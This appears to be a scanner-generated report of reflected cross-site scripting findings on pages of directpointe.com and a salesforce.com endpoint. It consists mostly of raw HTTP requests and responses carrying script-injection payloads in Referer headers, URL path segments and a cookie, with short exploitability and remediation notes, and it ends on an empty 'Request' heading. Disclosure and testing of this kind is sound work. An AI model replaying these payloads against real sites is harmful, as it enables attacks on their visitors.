Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes;
Referer: http://www.google.com/search?hl=en&q=5b07c"><script>alert(1)</script>721f7500c50
Response
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Nov 2010 17:16:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 33356
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- Copyright .... 2000-2010 DirectPointe Inc. All rights reserved. All ...[SNIP]... <input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=5b07c"><script>alert(1)</script>721f7500c50" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89c55"><script>alert(1)</script>00fa49d82d7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /solutions/cloud_computing.aspx HTTP/1.1
Host: www.directpointe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes;
Referer: http://www.google.com/search?hl=en&q=89c55"><script>alert(1)</script>00fa49d82d7
Response
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Nov 2010 17:16:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28697
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- Copyright .... 2000-2010 DirectPointe Inc. All rights reserved. All ...[SNIP]... <input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=89c55"><script>alert(1)</script>00fa49d82d7" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30575"><script>alert(1)</script>625d9dfb404 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /solutions/faq.aspx HTTP/1.1
Host: www.directpointe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes;
Referer: http://www.google.com/search?hl=en&q=30575"><script>alert(1)</script>625d9dfb404
Response
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Nov 2010 17:16:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34173
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- Copyright .... 2000-2010 DirectPointe Inc. All rights reserved. All ...[SNIP]... <input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=30575"><script>alert(1)</script>625d9dfb404" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58913"><script>alert(1)</script>7a9d1e18438 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /solutions/index.aspx HTTP/1.1
Host: www.directpointe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes;
Referer: http://www.google.com/search?hl=en&q=58913"><script>alert(1)</script>7a9d1e18438
Response
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Nov 2010 17:16:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 27786
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- Copyright .... 2000-2010 DirectPointe Inc. All rights reserved. All ...[SNIP]... <input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=58913"><script>alert(1)</script>7a9d1e18438" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a7a4"><script>alert(1)</script>d7c07aef017 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /solutions/industry_solutions.aspx HTTP/1.1 Host: www.directpointe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes; Referer: http://www.google.com/search?hl=en&q=1a7a4"><script>alert(1)</script>d7c07aef017
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 20 Nov 2010 17:16:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 29031
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- Copyright .... 2000-2010 DirectPointe Inc. All rights reserved. All ...[SNIP]... <input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=1a7a4"><script>alert(1)</script>d7c07aef017" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81edd"><script>alert(1)</script>d90cba90a62 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /solutions/network_services.aspx HTTP/1.1 Host: www.directpointe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes; Referer: http://www.google.com/search?hl=en&q=81edd"><script>alert(1)</script>d90cba90a62
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 20 Nov 2010 17:16:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 34895
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- Copyright .... 2000-2010 DirectPointe Inc. All rights reserved. All ...[SNIP]... <input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=81edd"><script>alert(1)</script>d90cba90a62" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 491b9"><script>alert(1)</script>b3e60a476d3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /solutions/newsletter.aspx HTTP/1.1 Host: www.directpointe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes; Referer: http://www.google.com/search?hl=en&q=491b9"><script>alert(1)</script>b3e60a476d3
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 20 Nov 2010 17:16:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 39022
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- Copyright .... 2000-2010 DirectPointe Inc. All rights reserved. All ...[SNIP]... <input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=491b9"><script>alert(1)</script>b3e60a476d3" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8832a"><script>alert(1)</script>0cd7a64e812 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /solutions/pc_services.aspx HTTP/1.1 Host: www.directpointe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes; Referer: http://www.google.com/search?hl=en&q=8832a"><script>alert(1)</script>0cd7a64e812
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 20 Nov 2010 17:16:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 36807
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- Copyright .... 2000-2010 DirectPointe Inc. All rights reserved. All ...[SNIP]... <input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=8832a"><script>alert(1)</script>0cd7a64e812" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 692cd"><script>alert(1)</script>8b0e02254fa was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /solutions/print_services.aspx HTTP/1.1 Host: www.directpointe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes; Referer: http://www.google.com/search?hl=en&q=692cd"><script>alert(1)</script>8b0e02254fa
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 20 Nov 2010 17:16:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 29507
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- Copyright .... 2000-2010 DirectPointe Inc. All rights reserved. All ...[SNIP]... <input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=692cd"><script>alert(1)</script>8b0e02254fa" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bc59"><script>alert(1)</script>a8a958513fd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /solutions/professional_services.aspx HTTP/1.1 Host: www.directpointe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes; Referer: http://www.google.com/search?hl=en&q=7bc59"><script>alert(1)</script>a8a958513fd
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 20 Nov 2010 17:16:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 27202
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- Copyright .... 2000-2010 DirectPointe Inc. All rights reserved. All ...[SNIP]... <input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=7bc59"><script>alert(1)</script>a8a958513fd" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dd49"><script>alert(1)</script>17a849dc5b8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /solutions/server_services.aspx HTTP/1.1 Host: www.directpointe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes; Referer: http://www.google.com/search?hl=en&q=6dd49"><script>alert(1)</script>17a849dc5b8
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 20 Nov 2010 17:16:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 35212
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- Copyright .... 2000-2010 DirectPointe Inc. All rights reserved. All ...[SNIP]... <input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=6dd49"><script>alert(1)</script>17a849dc5b8" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2ac4"><script>alert(1)</script>7bf47ce86a6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /solutions/virtual_services.aspx HTTP/1.1 Host: www.directpointe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes; Referer: http://www.google.com/search?hl=en&q=c2ac4"><script>alert(1)</script>7bf47ce86a6
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 20 Nov 2010 17:16:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 33137
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- Copyright .... 2000-2010 DirectPointe Inc. All rights reserved. All ...[SNIP]... <input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=c2ac4"><script>alert(1)</script>7bf47ce86a6" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45763"><script>alert(1)</script>c320424055c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /thanks.aspx HTTP/1.1 Host: www.directpointe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes; Referer: http://www.google.com/search?hl=en&q=45763"><script>alert(1)</script>c320424055c
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 20 Nov 2010 17:16:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 22991
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- Copyright .... 2000-2010 DirectPointe Inc. All rights reserved. All ...[SNIP]... <input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=45763"><script>alert(1)</script>c320424055c" /> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 417d8'-alert(1)-'6dabe70f771 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /servlet/servlet.WebToLead HTTP/1.1 Host: www.salesforce.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=417d8'-alert(1)-'6dabe70f771
Response
HTTP/1.1 200 OK Server: SFDC Is-Processed: true Content-Type: text/html Date: Sat, 20 Nov 2010 17:20:31 GMT Connection: close Content-Length: 498
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <meta HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE"> <meta http-equiv="Refresh" content="0; URL=http://www.google.com/search?hl=en ...[SNIP]... <script> if (window.location.replace){ window.location.replace('http://www.google.com/search?hl=en&q=417d8'-alert(1)-'6dabe70f771'); } else {; window.location.href ='http://www.google.com/search?hl=en&q=417d8'-alert(1)-'6dabe70f771'; } </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript rest-of-line comment. The payload a9064%0aalert(1)//ea22cc46ca0 was submitted in the REST URL parameter 1. This input was echoed as a9064 alert(1)//ea22cc46ca0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload 2a8a4%0aalert(1)//c9db6d901a9 was submitted in the REST URL parameter 2. This input was echoed as 2a8a4 alert(1)//c9db6d901a9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f7e1'-alert(1)-'b912a2891cb was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
